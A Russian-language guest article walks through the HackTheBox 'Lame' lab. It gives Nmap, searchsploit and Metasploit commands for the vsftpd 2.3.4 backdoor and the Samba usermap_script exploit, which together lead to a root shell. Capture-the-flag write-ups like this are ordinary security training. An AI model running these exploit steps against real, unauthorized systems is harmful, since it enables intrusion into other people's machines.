• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Гостевая статья HackTheBox – Lame – Пошаговая демонстрация

HTB-Lame.png



Первый сбор информации, Nmap - отличный инструмент для получения всей информации об услугах, портах и многом другом.

Команда:
Код:
Nmap -sV -sC -A -oN name.txt ipaddress

Из сканирования Nmap мы узнали, что он использует уязвимый ftp-сервис версии vsftpd 2.3.4 и порт, который он использует, также открыт, он также имеет ssh сервис, но он не был уязвим, была служба NetBIOS и версия ПО samba выглядела уязвимой.

Мы попытались использовать FTP и нам удалось войти в ящик.

Команда:
Код:
ftp <ip-address>

Это было не так уж и полезно, поэтому мы продвинулись вперед с нашей другой важной информацией, мы узнали из информации Nmap сканирования, что ftp версия является уязвимой, поэтому мы попытались найти эксплойт для этой версии, мы использовали searchsploit, чтобы предложить некоторые хорошие эксплойты.

Команда:
Код:
searchsploit vsftpd 2.3.4

Searchsploit предложил несколько эксплойтов, мы искали больше эксплойтов во фреймворке Metasploit и нашли хороший эксплойт
Код:
exploit/unix/ftp/vsftpd_234_backdoor

Для выполнения этого эксплойта мы использовали простые команды Metasploit
Код:
use exploit/unix/vsftpd_234_backdoor

show options // для просмотра параметров, доступных для этого эксплойта
Код:
set RHOST ipaddress

exploit

После того, как мы попробовали этот эксплойт несколько раз, мы не нашли ничего полезного, поэтому мы попытались найти другое уязвимое программное обеспечение в окне, мы нашли версию samba уязвимой, поэтому мы проверили эту версию samba на наличие эксплойтов в searchsploit.

Команда:
Код:
searchsploit 3.0.20

Мы находим некоторые предложения по эксплойтам, мы выбираем тот, который с фреймворком Metasploit, мы использовали
Код:
exploit/multi/samba/usermap_script

Для запуска этого эксплойта, мы использовали простые команды Metasploit,
Код:
use exploit/multi/samba/usermap_script

show options

set RHOST ipaddress

exploit

Через несколько секунд мы получили нашу оболочку, откуда нашли наш флаг в текстовом файле под названием root.txt.


 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!